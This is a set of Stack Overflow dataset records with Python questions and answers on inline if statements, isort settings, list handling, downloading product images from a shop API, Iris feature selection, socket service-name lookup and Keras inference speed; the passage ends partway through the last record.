Dataset fields:
content             string (lengths 85 to 101k)
title               string (lengths 0 to 150)
question            string (lengths 15 to 48k)
answers             list
answers_scores      list
non_answers         list
non_answers_scores  list
tags                list
name                string (lengths 35 to 137)
Q: How to use inline if statement am fairly new to programming and i don't get how the inline if statement works. i wanna do something like this: tries = 0 Numbers = "Hello world" for x in Numbers: (print(( f"found{x}" if x == "o" else None)), tries += 1 if x != "o" else 0) so if it does find x which is "o" it prints it else it adds 1 to tries, i tried multiple ways of doing it but none of them worked ( i know my code looks very weird and all but i'm still learning so please no bullying!) i tried many things none of them worked A: As others have already commented, this is not a good idea. It's hard to read and doesn't make anything better. Just to provide an actual answer to your question: tries = 0 Numbers = "Hello world" for x in Numbers: tries += 0 if x == "o" and not print(f"found{x}") else 1 When x is "o", then the second part of the condition will be checked, which checks if the print statement is not true. print should return None so not None becomes true, which means the condition is true and 0 will be added to tries. If x is not "o" then the condition is false and 1 will be added.
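For comparison with the one-liner above, here is a minimal sketch of the same logic written as a plain if/else loop, which is the idiomatic form the commenters allude to. Variable names and the f-string follow the question; the final print of tries is added only to show the count.

tries = 0
Numbers = "Hello world"
for x in Numbers:
    if x == "o":
        print(f"found{x}")
    else:
        tries += 1
print(tries)  # 9 for "Hello world": 11 characters, 2 of them "o"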
How to use inline if statement
am fairly new to programming and i don't get how the inline if statement works. i wanna do something like this: tries = 0 Numbers = "Hello world" for x in Numbers: (print(( f"found{x}" if x == "o" else None)), tries += 1 if x != "o" else 0) so if it does find x which is "o" it prints it else it adds 1 to tries, i tried multiple ways of doing it but none of them worked ( i know my code looks very weird and all but i'm still learning so please no bullying!) i tried many things none of them worked
[ "As others have already commented, this is not a good idea.\nIt's hard to read and doesn't make anything better.\n\nJust to provide an actual answer to your question:\ntries = 0\nNumbers = \"Hello world\"\nfor x in Numbers: tries += 0 if x == \"o\" and not print(f\"found{x}\") else 1\n\nWhen x is \"o\", then the second part of the condition will be checked, which checks if the print statement is not true. print should return None so not None becomes true, which means the condition is true and 0 will be added to tries. If x is not \"o\" then the condition is false and 1 will be added.\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074574312_python.txt
Q: How to configure line length for VS Code python Sort Imports in user settings? I'm using the Sort Imports function of the Python extension for VS Code. I'd like to configure the line length for this to 100; however, I've been unable to properly set this in my settings.json file. From the documentation, it seems like "python.sortImports.args": ["-l", "100"] should work, but it's giving me an error: Invalid patch string: Skipped 1 files. Any ideas? A: There is a known bug with using Sort Imports on __init__.py files. Here is the full solution to put in vscode's .vscode/settings.json: "python.sortImports.args": ["-ns", "__init__.py", "-l", "100"], A: Nowadays, it's done by adding: "isort.args": ["-l", "100"], to your settings file.
How to configure line length for VS Code python Sort Imports in user settings?
I'm using the Sort Imports function of the Python extension for VS Code. I'd like to configure the line length for this to 100; however, I've been unable to properly set this in my settings.json file. From the documentation, it seems like "python.sortImports.args": ["-l", "100"] should work, but it's giving me an error: Invalid patch string: Skipped 1 files. Any ideas?
[ "There is a known bug with using Sort Imports on __init__.py files. Here is the full solution to put in vscode's .vscode/settings.json:\n\"python.sortImports.args\": [\"-ns\", \"__init__.py\", \"-l\", \"100\"],\n\n", "Nowdays, it's adding:\n \"isort.args\": [\"-l\", \"100\"],\n\nto your settings file.\n" ]
[ 6, 0 ]
[]
[]
[ "python", "visual_studio_code", "vscode_settings" ]
stackoverflow_0052046251_python_visual_studio_code_vscode_settings.txt
Q: Doesn't remove duplicate strings in the list in one instance How do I make a for loop in elif choice == 2? let's say I have the list ["egg, "eGG", "radish", "pork", "meat"] from user input, if the user decides to remove egg, both egg and eGG should be removed. Here's my code: print(" MY GROCERY LIST ") #function that adds items, removes items, prints the list of items, exits the program with the user's will. def grocerylist(): grocery_list = [""] grocery = True #while loop while grocery: choice = str(input("=====================\nWhat would you like to do? \n1 - Add an item\n2 - Remove an item \n3 - Print entire list\n4 - Exit program\n\nChoice: ")) #conditionals #adds an item if choice == "1": print("=====================\nADD AN ITEM\n") add_item = str(input("What would you like to add? \nItem name: ")).format() #format function grocery_list.append(add_item) #removes an item elif choice == "2": print("=====================\nREMOVE AN ITEM\n") remove_item = str(input("What would you like to remove? \nItem name: ")).format() #format function grocery_list.remove(remove_item) #prints the entire list elif choice == "3": print("=====================\nPRINTING LIST...") #for loop to iterate grocery_list for i in grocery_list: print(i) #terminates the program elif choice == "4": print("=====================\nTerminating program...") break else: pass #calling of function grocerylist() I tried using a for loop but it didn't work. A: You can use a while loop to loop over all the items in the array, and then use call the lower() function on each element in the array list. This will make all the characters in an element lowercase and then you can compare. You would also have to lowercase the user input to compare correctly. elif choice == "2": print("=====================\nREMOVE AN ITEM\n") remove_item = str(input("What would you like to remove? \nItem name: ")) i = 0 while i < len(grocery_list): if grocery_list[i].lower() == remove_item.lower(): grocery_list.pop(i) else: i += 1 However, I would recommend using another array, and then appending the results that do not match the item you are trying to remove. The resulting tempArray will contain only the remaining items.
Doesn't remove duplicate strings in the list in one instance
How do I make a for loop in elif choice == 2? let's say I have the list ["egg, "eGG", "radish", "pork", "meat"] from user input, if the user decides to remove egg, both egg and eGG should be removed. Here's my code: print(" MY GROCERY LIST ") #function that adds items, removes items, prints the list of items, exits the program with the user's will. def grocerylist(): grocery_list = [""] grocery = True #while loop while grocery: choice = str(input("=====================\nWhat would you like to do? \n1 - Add an item\n2 - Remove an item \n3 - Print entire list\n4 - Exit program\n\nChoice: ")) #conditionals #adds an item if choice == "1": print("=====================\nADD AN ITEM\n") add_item = str(input("What would you like to add? \nItem name: ")).format() #format function grocery_list.append(add_item) #removes an item elif choice == "2": print("=====================\nREMOVE AN ITEM\n") remove_item = str(input("What would you like to remove? \nItem name: ")).format() #format function grocery_list.remove(remove_item) #prints the entire list elif choice == "3": print("=====================\nPRINTING LIST...") #for loop to iterate grocery_list for i in grocery_list: print(i) #terminates the program elif choice == "4": print("=====================\nTerminating program...") break else: pass #calling of function grocerylist() I tried using a for loop but it didn't work.
[ "You can use a while loop to loop over all the items in the array, and then use call the lower() function on each element in the array list. This will make all the characters in an element lowercase and then you can compare. You would also have to lowercase the user input to compare correctly.\nelif choice == \"2\":\n print(\"=====================\\nREMOVE AN ITEM\\n\")\n remove_item = str(input(\"What would you like to remove? \\nItem name: \"))\n i = 0\n while i < len(grocery_list):\n if grocery_list[i].lower() == remove_item.lower():\n grocery_list.pop(i)\n else:\n i += 1\n\nHowever, I would recommend using another array, and then appending the results that do not match the item you are trying to remove. The resulting tempArray will contain only the remaining items.\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074574364_python.txt
Q: How can you download all non-obvious images with Beautifulsoup/Selenium? I'm making next little project to learn - it's what I'm trying to do past few days, without success. I want to make list of opals, their prices...and download their images from website. At end (probably) here are two ways: assign opals to images (in word or excel) or just save images with name of opal+price. I succeed at making list of name+price (using help I gained from previous topics), but I can't get into images. They don't have .jpg, here is not 'src' and when I 'extracted' example img link, it was wrong, too. Take a look: /storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF352%2FFF36%2F99BC%2F5F60%2F0A0C%2F6D0B%2FF3AC%2FIMG-8248VOLL_5_ECK.JPG&shop=80300026&width={width}&height=2560 EDIT: 'code edited, too' - I managed to extract just the list of img list I needed. Below is how img class of this website looks like: And my code is below - it doesn't download images yet :( import requests from bs4 import BeautifulSoup URL = 'https://www.koroit-opal-company.com/en/c/solid-opals' page = requests.get(URL) headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"} soup = BeautifulSoup(requests.get(f'https://www.koroit-opal-company.com/en/c/solid-opals', headers=headers).text, "lxml") # print(soup.prettify()) names = [n.getText(strip=True) for n in soup.select("div div div a h2")] # print(names) prices = [n.getText(strip=True) for n in soup.select("div div div h3")] # print(prices) for name, price in zip(names, prices): print(f"{name} {price}") opal_list = soup.find('div', attrs = {'class':'content'}) #gives just fragment of website where opal imgs are imgs = opal_list.find_all('img') print(imgs) example = imgs[0] x = example.attrs['data-src'] print(x) result = soup.find_all(lambda tag: tag.name == 'img' and tag.get('class') == ['product-item-image']) print(result) A: you can use the API and all downloaded images ll be next to the executable file: import requests def get_info(page: int): url = f"https://www.koroit-opal-company.com/api/v2/products?sort=position-asc&resultsPerPage=12&page={page}&categoryId=551DDBD9-8AD4-229C-164A-C0A82AB9D825&locale=en_GB&shop=80300026" response = requests.get(url) for opal in response.json()['products']: img_link = 'https://www.koroit-opal-company.com' + opal['image']['url'] print(opal['name'], opal['price']['formatted'], img_link) download_image(img_link, opal['name']) def download_image(image_url: str, image_name: str): img_data = requests.get(image_url).content with open(image_name + '.jpg', 'wb') as handler: handler.write(img_data) get_info(1) OTPUT for page 1: 1,38 ct Boulder opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF352%2FFF36%2F99BC%2F5F60%2F0A0C%2F6D0B%2FF3AC%2FIMG-8248VOLL_5_ECK.JPG&shop=80300026 4,27 ct Black opal 3,300.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F5A8D%2F6108%2F2341%2FEB00%2F2803%2F0A0C%2F6D04%2FCDD2%2FIMG-7618VOLL_5_ECK.JPG&shop=80300026 4,52 ct Boulder opal 80.00 € 
https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF4E2%2FAFCE%2FF6ED%2F688E%2F0A0C%2F6D0F%2F3E17%2FIMG-8110VOLL_5_ECK.JPG&shop=80300026 0,85 ct Boulder opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF540%2FD8D2%2FE5C6%2F9854%2F0A0C%2F6D0B%2F05BA%2FIMG-8018VOLL_5_ECK.JPG&shop=80300026 13,14 ct Crystal opal 400.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6286%2F56CC%2FED12%2F1E08%2FECEF%2F0A0C%2F6D0B%2F5AAC%2FIMG-9213_HOCH_MAI_22.JPG&shop=80300026 5,85 ct Boulder opal 80.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF59C%2F77B0%2FF735%2F05AF%2F0A0C%2F6D0F%2F8E4C%2FIMG-7990VOLL_5_ECK.JPG&shop=80300026 11,38 ct Boulder opal 2,400.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F594A%2F94B3%2FC880%2FF5AB%2F848B%2FC0A8%2F2AB9%2F4A53%2FIMG-8598VOLL_5_ECK.JPG&shop=80300026 2,41 ct Crystal opal 60.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF66A%2F867E%2F23D7%2FBF76%2F0A0C%2F6D0B%2F947B%2FIMG-8994VOLL_5_ECK.JPG&shop=80300026 6,94 ct Boulder opal 1,600.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F5AB9%2F3AB7%2F8F7A%2F659C%2FDDE4%2F0A0C%2F6D00%2FF73C%2FIMG-7672VOLL_5_ECK.JPG&shop=80300026 2,28 ct Crystal opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF4D7%2FAEFE%2FF74C%2F9A52%2F0A0C%2F6D0B%2F0587%2FIMG-8045VOLL_5_ECK.JPG&shop=80300026 1,48 ct Crystal opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF3B9%2F7E20%2F2E27%2FFB71%2F0A0C%2F6D0F%2FC782%2FIMG-8242VOLL_5_ECK.JPG&shop=80300026 11,29 ct Crystal opal 600.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6335%2FB93C%2F9276%2F3389%2FB532%2F0A0C%2F6D0B%2F3404%2FIMG-5671VOLL_5_ECK.JPG&shop=80300026 UPDATE: michalb93 asked how find api link: Press "Show more" button with open dev tools on network tab ctrl+f and search new opal's name, i search "2,75 ct Crystal opal" After pressing Enter, u get list of requests which contain this name, u can see it in the attached screenshot.
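The snippet above downloads a single page; a sketch of looping over every page follows. The stop condition (an empty products list once we run past the last page) and the file-name sanitising are assumptions, not something the API documentation confirms.

import requests

BASE = "https://www.koroit-opal-company.com"

def download_all_pages(max_pages=50):
    for page in range(1, max_pages + 1):
        url = (f"{BASE}/api/v2/products?sort=position-asc&resultsPerPage=12"
               f"&page={page}&categoryId=551DDBD9-8AD4-229C-164A-C0A82AB9D825"
               f"&locale=en_GB&shop=80300026")
        products = requests.get(url).json().get('products', [])
        if not products:          # assumed: empty list means no more pages
            break
        for opal in products:
            img_link = BASE + opal['image']['url']
            safe_name = opal['name'].replace('/', '_')   # avoid invalid path characters
            with open(safe_name + '.jpg', 'wb') as handler:
                handler.write(requests.get(img_link).content)

download_all_pages()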
How can you download all non-obvious images with Beautifulsoup/Selenium?
I'm making next little project to learn - it's what I'm trying to do past few days, without success. I want to make list of opals, their prices...and download their images from website. At end (probably) here are two ways: assign opals to images (in word or excel) or just save images with name of opal+price. I succeed at making list of name+price (using help I gained from previous topics), but I can't get into images. They don't have .jpg, here is not 'src' and when I 'extracted' example img link, it was wrong, too. Take a look: /storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF352%2FFF36%2F99BC%2F5F60%2F0A0C%2F6D0B%2FF3AC%2FIMG-8248VOLL_5_ECK.JPG&shop=80300026&width={width}&height=2560 EDIT: 'code edited, too' - I managed to extract just the list of img list I needed. Below is how img class of this website looks like: And my code is below - it doesn't download images yet :( import requests from bs4 import BeautifulSoup URL = 'https://www.koroit-opal-company.com/en/c/solid-opals' page = requests.get(URL) headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"} soup = BeautifulSoup(requests.get(f'https://www.koroit-opal-company.com/en/c/solid-opals', headers=headers).text, "lxml") # print(soup.prettify()) names = [n.getText(strip=True) for n in soup.select("div div div a h2")] # print(names) prices = [n.getText(strip=True) for n in soup.select("div div div h3")] # print(prices) for name, price in zip(names, prices): print(f"{name} {price}") opal_list = soup.find('div', attrs = {'class':'content'}) #gives just fragment of website where opal imgs are imgs = opal_list.find_all('img') print(imgs) example = imgs[0] x = example.attrs['data-src'] print(x) result = soup.find_all(lambda tag: tag.name == 'img' and tag.get('class') == ['product-item-image']) print(result)
[ "you can use the API and all downloaded images ll be next to the executable file:\nimport requests\n\n\ndef get_info(page: int):\n url = f\"https://www.koroit-opal-company.com/api/v2/products?sort=position-asc&resultsPerPage=12&page={page}&categoryId=551DDBD9-8AD4-229C-164A-C0A82AB9D825&locale=en_GB&shop=80300026\"\n response = requests.get(url)\n for opal in response.json()['products']:\n img_link = 'https://www.koroit-opal-company.com' + opal['image']['url']\n print(opal['name'], opal['price']['formatted'], img_link)\n download_image(img_link, opal['name'])\n\n\ndef download_image(image_url: str, image_name: str):\n img_data = requests.get(image_url).content\n with open(image_name + '.jpg', 'wb') as handler:\n handler.write(img_data)\n\n\nget_info(1)\n\nOTPUT for page 1:\n1,38 ct Boulder opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF352%2FFF36%2F99BC%2F5F60%2F0A0C%2F6D0B%2FF3AC%2FIMG-8248VOLL_5_ECK.JPG&shop=80300026\n4,27 ct Black opal 3,300.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F5A8D%2F6108%2F2341%2FEB00%2F2803%2F0A0C%2F6D04%2FCDD2%2FIMG-7618VOLL_5_ECK.JPG&shop=80300026\n4,52 ct Boulder opal 80.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF4E2%2FAFCE%2FF6ED%2F688E%2F0A0C%2F6D0F%2F3E17%2FIMG-8110VOLL_5_ECK.JPG&shop=80300026\n0,85 ct Boulder opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF540%2FD8D2%2FE5C6%2F9854%2F0A0C%2F6D0B%2F05BA%2FIMG-8018VOLL_5_ECK.JPG&shop=80300026\n13,14 ct Crystal opal 400.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6286%2F56CC%2FED12%2F1E08%2FECEF%2F0A0C%2F6D0B%2F5AAC%2FIMG-9213_HOCH_MAI_22.JPG&shop=80300026\n5,85 ct Boulder opal 80.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF59C%2F77B0%2FF735%2F05AF%2F0A0C%2F6D0F%2F8E4C%2FIMG-7990VOLL_5_ECK.JPG&shop=80300026\n11,38 ct Boulder opal 2,400.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F594A%2F94B3%2FC880%2FF5AB%2F848B%2FC0A8%2F2AB9%2F4A53%2FIMG-8598VOLL_5_ECK.JPG&shop=80300026\n2,41 ct Crystal opal 60.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF66A%2F867E%2F23D7%2FBF76%2F0A0C%2F6D0B%2F947B%2FIMG-8994VOLL_5_ECK.JPG&shop=80300026\n6,94 ct Boulder opal 1,600.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F5AB9%2F3AB7%2F8F7A%2F659C%2FDDE4%2F0A0C%2F6D00%2FF73C%2FIMG-7672VOLL_5_ECK.JPG&shop=80300026\n2,28 ct Crystal opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF4D7%2FAEFE%2FF74C%2F9A52%2F0A0C%2F6D0B%2F0587%2FIMG-8045VOLL_5_ECK.JPG&shop=80300026\n1,48 ct Crystal opal 70.00 € 
https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF3B9%2F7E20%2F2E27%2FFB71%2F0A0C%2F6D0F%2FC782%2FIMG-8242VOLL_5_ECK.JPG&shop=80300026\n11,29 ct Crystal opal 600.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6335%2FB93C%2F9276%2F3389%2FB532%2F0A0C%2F6D0B%2F3404%2FIMG-5671VOLL_5_ECK.JPG&shop=80300026\n\nUPDATE:\nmichalb93 asked how find api link:\n\nPress \"Show more\" button with open dev tools on network tab\nctrl+f and search new opal's name, i search \"2,75 ct Crystal opal\"\nAfter pressing Enter, u get list of requests which contain this name, u can see it in the attached screenshot.\n\n\n" ]
[ 2 ]
[]
[]
[ "beautifulsoup", "html", "python", "selenium", "web_scraping" ]
stackoverflow_0074574105_beautifulsoup_html_python_selenium_web_scraping.txt
Q: how do I make the independent variables columns and targets into variables X and y how do I make the independent variables columns and targets into variables X and y #independent columns --> SepalLengthCm, SepalWidthCm, PetalLengthCm, PetalWidthCm X = df1.<...> #target columns --> species y = df1.<...> A: you can do the following. x = df.iloc[:, [0, 1, 2, 3]].values Here you use iloc Docs, so you take all elements (:) from columns with index [0,1,2,3] then you take the values because iloc returns pandas object. For target, you can do the following. y = df.iloc[:, [4]].values This dataset is really popular, here you can find a lot of examples exploring and working with it Iris examples.
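The answer selects columns by position with iloc; selecting by label can read more clearly. The sketch below builds a stand-in DataFrame with the column names from the question (the exact capitalisation of the species column is an assumption) and pulls X and y by name.

import pandas as pd
from sklearn.datasets import load_iris

iris = load_iris()
df1 = pd.DataFrame(iris.data, columns=['SepalLengthCm', 'SepalWidthCm',
                                       'PetalLengthCm', 'PetalWidthCm'])
df1['Species'] = iris.target

# independent columns by label
X = df1[['SepalLengthCm', 'SepalWidthCm', 'PetalLengthCm', 'PetalWidthCm']].values
# target column by label
y = df1['Species'].values
print(X.shape, y.shape)   # (150, 4) (150,)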
how do I make the independent variables columns and targets into variables X and y
how do I make the independent variables columns and targets into variables X and y #independent columns --> SepalLengthCm, SepalWidthCm, PetalLengthCm, PetalWidthCm X = df1.<...> #target columns --> species y = df1.<...>
[ "you can do the following.\nx = df.iloc[:, [0, 1, 2, 3]].values\n\nHere you use iloc Docs, so you take all elements (:) from columns with index [0,1,2,3] then you take the values because iloc returns pandas object.\nFor target, you can do the following.\ny = df.iloc[:, [4]].values\n\nThis dataset is really popular, here you can find a lot of examples exploring and working with it Iris examples.\n" ]
[ 0 ]
[]
[]
[ "jupyter_notebook", "python" ]
stackoverflow_0074574291_jupyter_notebook_python.txt
Q: OSError: port/proto not found in for loop I wrote a python script using the socket module, which provides getservbyport for retrieving a service name based on a port number argument. I used the following code: import socket socket.getservbyport(443) # 'https' But with certain port numbers i'm getting the following error: socket.getservbyport(675) Traceback (most recent call last): File "<pyshell#1>", line 1, in <module> socket.getservbyport(675) OSError: port/proto not found Can someone explain to me why i am getting this error? Also i want to list the services with their matching port, so I eliminated the errors using try and except method like the following code: for i in range(0,65536,1): try: print(i,"Runs, service:",socket.getservbyport(i)) except: continue I'm getting the ports which have a service, but I want to list the serial numbers before the port numbers. Since I used except method the errors are eliminated so I can't number them. A: The error OSError: port/proto not found is thrown when no service is found on that port. So if you're iterating through all possible ports, odds are you will almost certainly get that error. Catching the error is the right way to go. To achieve what you need, use a separate counter to keep track of the number of services found: counter = 1 for i in range(0, 65536): try: service = socket.getservbyport(i) print(counter, " port nr ", i, " runs service ", service) counter += 1 except: continue Alternatively if you would like the services data elsewhere, store the services in-order in an array, like so: services = [] for i in range(0, 65536): service = None try: service = socket.getservbyport(i) except: pass if service is not None: services += [{'service': service, 'port': i}] for idx, s in enumerate(services): print(idx, " port nr ", s['port'], " runs service ", s['service']) A: You can solve the problem of OSError: port/proto not found by adding the tcp protocol like this import socket print(socket.getservbyport(22, "tcp"))
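Combining the two answers above — numbering the results and passing an explicit protocol — a sketch might look like this; it also catches OSError specifically rather than using a bare except.

import socket

def known_services():
    for port in range(1, 65536):
        for proto in ('tcp', 'udp'):
            try:
                yield port, proto, socket.getservbyport(port, proto)
            except OSError:
                continue   # no service registered for this port/protocol

for idx, (port, proto, name) in enumerate(known_services(), start=1):
    print(idx, "port", port, f"({proto})", "runs service", name)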
OSError: port/proto not found in for loop
I wrote a python script using the socket module, which provides getservbyport for retrieving a service name based on a port number argument. I used the following code: import socket socket.getservbyport(443) # 'https' But with certain port numbers i'm getting the following error: socket.getservbyport(675) Traceback (most recent call last): File "<pyshell#1>", line 1, in <module> socket.getservbyport(675) OSError: port/proto not found Can someone explain to me why i am getting this error? Also i want to list the services with their matching port, so I eliminated the errors using try and except method like the following code: for i in range(0,65536,1): try: print(i,"Runs, service:",socket.getservbyport(i)) except: continue I'm getting the ports which have a service, but I want to list the serial numbers before the port numbers. Since I used except method the errors are eliminated so I can't number them.
[ "The error OSError: port/proto not found is thrown when no service is found on that port. So if you're iterating through all possible ports, odds are you will almost certainly get that error. Catching the error is the right way to go.\nTo achieve what you need, use a separate counter to keep track of the number of services found:\ncounter = 1\nfor i in range(0, 65536):\n try:\n service = socket.getservbyport(i)\n print(counter, \" port nr \", i, \" runs service \", service)\n counter += 1\n except:\n continue\n\nAlternatively if you would like the services data elsewhere, store the services in-order in an array, like so:\nservices = []\nfor i in range(0, 65536):\n service = None\n try:\n service = socket.getservbyport(i)\n except:\n pass\n if service is not None:\n services += [{'service': service, 'port': i}]\n\nfor idx, s in enumerate(services):\n print(idx, \" port nr \", s['port'], \" runs service \", s['service'])\n\n", "You can solve the problem of\nOSError: port/proto not found\nby adding the tcp protocol like this\nimport socket\nprint(socket.getservbyport(22, \"tcp\"))\n\n" ]
[ 3, 0 ]
[]
[]
[ "for_loop", "network_programming", "python", "sockets" ]
stackoverflow_0037644773_for_loop_network_programming_python_sockets.txt
Q: Keras model predict iteration getting slower. Hi I have some problem about Keras with python 3.6 My enviroment is keras with Python and Only CPU. but the problem is when I iterate same Keras model for predict some diferrent input, its getting slower and slower.. my code is so simple just like that for i in range(100): model.predict(x) the First run is fast. it takes 2 seconds may be. but second run takes 3 seconds and Third takes 5 seconds... its getting slower and slower even if I use same input. what can I iterate predict keras model hold fast? I don't want any getting slower.. it will be very critical. How can I Fix IT?? A: Try using the __call__ method directly. The documentation of the predict method states the following: For small numbers of inputs that fit in one batch, directly use __call__() for faster execution, e.g., model(x). I see the performance is critical in this case. So, if it doesn't help, you could use OpenVINO which is optimized for Intel hardware but it should work with any CPU. Your performance should be much better than using Keras directly. It's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets below. Install OpenVINO The easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case. pip install openvino-dev[tensorflow2] Save your model as SavedModel OpenVINO is not able to convert HDF5 model, so you have to save it as SavedModel first. import tensorflow as tf from custom_layer import CustomLayer model = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer}) tf.saved_model.save(model, 'model') Use Model Optimizer to convert SavedModel model The Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, which is a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line: mo --saved_model_dir "model" --data_type FP32 --output_dir "model_ir" Run the inference The converted model can be loaded by the runtime and compiled for a specific device e.g. CPU or GPU (integrated into your CPU like Intel HD Graphics). If you don't know what is the best choice for you, use AUTO. # Load the network ie = Core() model_ir = ie.read_model(model="model_ir/model.xml") compiled_model_ir = ie.compile_model(model=model_ir, device_name="CPU") # Get output layer output_layer_ir = compiled_model_ir.output(0) # Run inference on the input image result = compiled_model_ir([input_image])[output_layer_ir] Disclaimer: I work on OpenVINO.
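A minimal sketch of the direct-call style recommended in the answer; the tiny model here is only a stand-in, since the real architecture in the question is unknown.

import numpy as np
import tensorflow as tf

# Stand-in model; replace with your own loaded model.
model = tf.keras.Sequential([tf.keras.Input(shape=(10,)),
                             tf.keras.layers.Dense(1)])
x = np.random.rand(1, 10).astype("float32")

# model(x) skips predict()'s per-call batching overhead for single small inputs,
# so the loop should not slow down from call to call.
for i in range(100):
    y = model(x, training=False)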
Keras model predict iteration getting slower
Hi, I have a problem with Keras on Python 3.6. My environment is Keras with Python, CPU only. The problem is that when I repeatedly call predict on the same Keras model for different inputs, it gets slower and slower. My code is as simple as: for i in range(100): model.predict(x) The first run is fast, maybe 2 seconds, but the second run takes 3 seconds and the third takes 5 seconds... it keeps getting slower even if I use the same input. How can I keep repeated predict calls on a Keras model fast? I don't want any slowdown; it is very critical. How can I fix it?
[ "Try using the __call__ method directly. The documentation of the predict method states the following:\n\nFor small numbers of inputs that fit in one batch, directly use __call__() for faster execution, e.g., model(x).\n\nI see the performance is critical in this case. So, if it doesn't help, you could use OpenVINO which is optimized for Intel hardware but it should work with any CPU. Your performance should be much better than using Keras directly.\nIt's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets below.\nInstall OpenVINO\nThe easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case.\npip install openvino-dev[tensorflow2]\n\nSave your model as SavedModel\nOpenVINO is not able to convert HDF5 model, so you have to save it as SavedModel first.\nimport tensorflow as tf\nfrom custom_layer import CustomLayer\nmodel = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer})\ntf.saved_model.save(model, 'model')\n\nUse Model Optimizer to convert SavedModel model\nThe Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, which is a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line:\nmo --saved_model_dir \"model\" --data_type FP32 --output_dir \"model_ir\"\n\nRun the inference\nThe converted model can be loaded by the runtime and compiled for a specific device e.g. CPU or GPU (integrated into your CPU like Intel HD Graphics). If you don't know 